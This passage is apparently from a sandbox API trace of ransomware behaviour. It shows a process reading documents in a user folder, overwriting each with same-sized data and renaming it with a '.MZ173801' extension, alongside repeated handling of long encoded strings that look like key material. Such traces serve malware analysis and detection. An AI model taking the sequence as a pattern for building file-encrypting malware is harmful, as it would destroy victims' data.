ftCreationTime.dwLowDateTime=0xdc651760, ftCreationTime.dwHighDateTime=0x1d5e809, ftLastAccessTime.dwLowDateTime=0xd70a6520, ftLastAccessTime.dwHighDateTime=0x1d5ed10, ftLastWriteTime.dwLowDateTime=0xd70a6520, ftLastWriteTime.dwHighDateTime=0x1d5ed10, nFileSizeHigh=0x0, nFileSizeLow=0x119aa)) returned 1 [0122.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.499] GetCurrentThreadId () returned 0x1358 [0122.499] GetCurrentThreadId () returned 0x1358 [0122.499] GetCurrentThreadId () returned 0x1358 [0122.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.500] GetCurrentThreadId () returned 0x1358 [0122.500] GetCurrentThreadId () returned 0x1358 [0122.500] GetCurrentThreadId () returned 0x1358 [0122.500] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\PlN2\\PF1Hk1o6iJ_U1EnULHZ.csv" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\pln2\\pf1hk1o6ij_u1enulhz.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0122.500] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0122.500] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0122.500] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x119aa [0122.500] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0122.500] ReadFile (in: hFile=0x40c, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x119aa, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f14c*=0x119aa, lpOverlapped=0x0) returned 1 [0122.502] CloseHandle (hObject=0x40c) returned 1 [0122.503] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\PlN2\\PF1Hk1o6iJ_U1EnULHZ.csv" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\pln2\\pf1hk1o6ij_u1enulhz.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0122.504] WriteFile (in: hFile=0x40c, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x119aa, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f158*=0x119aa, lpOverlapped=0x0) returned 1 [0122.507] CloseHandle (hObject=0x40c) returned 1 [0122.507] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\PlN2\\PF1Hk1o6iJ_U1EnULHZ.csv" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\pln2\\pf1hk1o6ij_u1enulhz.csv"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\PlN2\\PF1Hk1o6iJ_U1EnULHZ.csv.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\pln2\\pf1hk1o6ij_u1enulhz.csv.mz173801")) returned 1 [0122.508] GetCurrentThreadId () returned 0x1358 [0122.508] GetCurrentThreadId () returned 0x1358 [0122.508] GetCurrentThreadId () returned 0x1358 [0122.508] GetCurrentThreadId () returned 0x1358 [0122.508] GetCurrentThreadId () returned 0x1358 [0122.508] GetCurrentThreadId () returned 0x1358 [0122.508] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ca2e820, ftCreationTime.dwHighDateTime=0x1d5eae6, ftLastAccessTime.dwLowDateTime=0xa0dd240, ftLastAccessTime.dwHighDateTime=0x1d5e2df, ftLastWriteTime.dwLowDateTime=0xa0dd240, ftLastWriteTime.dwHighDateTime=0x1d5e2df, nFileSizeHigh=0x0, nFileSizeLow=0x16c78, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="RLrwCvmuE.xlsx", cAlternateFileName="RLRWCV~1.XLS")) returned 1 [0122.508] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0122.508] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0122.508] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\PlN2\\RLrwCvmuE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\pln2\\rlrwcvmue.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ca2e820, ftCreationTime.dwHighDateTime=0x1d5eae6, ftLastAccessTime.dwLowDateTime=0xa0dd240, ftLastAccessTime.dwHighDateTime=0x1d5e2df, ftLastWriteTime.dwLowDateTime=0xa0dd240, ftLastWriteTime.dwHighDateTime=0x1d5e2df, nFileSizeHigh=0x0, nFileSizeLow=0x16c78)) returned 1 [0122.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.509] GetCurrentThreadId () returned 0x1358 [0122.509] GetCurrentThreadId () returned 0x1358 [0122.509] GetCurrentThreadId () returned 0x1358 [0122.509] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.509] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.509] GetCurrentThreadId () returned 0x1358 [0122.509] GetCurrentThreadId () returned 0x1358 [0122.509] GetCurrentThreadId () returned 0x1358 [0122.509] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\PlN2\\RLrwCvmuE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\pln2\\rlrwcvmue.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0122.510] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0122.510] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0122.510] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x16c78 [0122.510] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0122.510] ReadFile (in: hFile=0x40c, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x16c78, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f14c*=0x16c78, lpOverlapped=0x0) returned 1 [0122.511] CloseHandle (hObject=0x40c) returned 1 [0122.512] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\PlN2\\RLrwCvmuE.xlsx" (normalized: 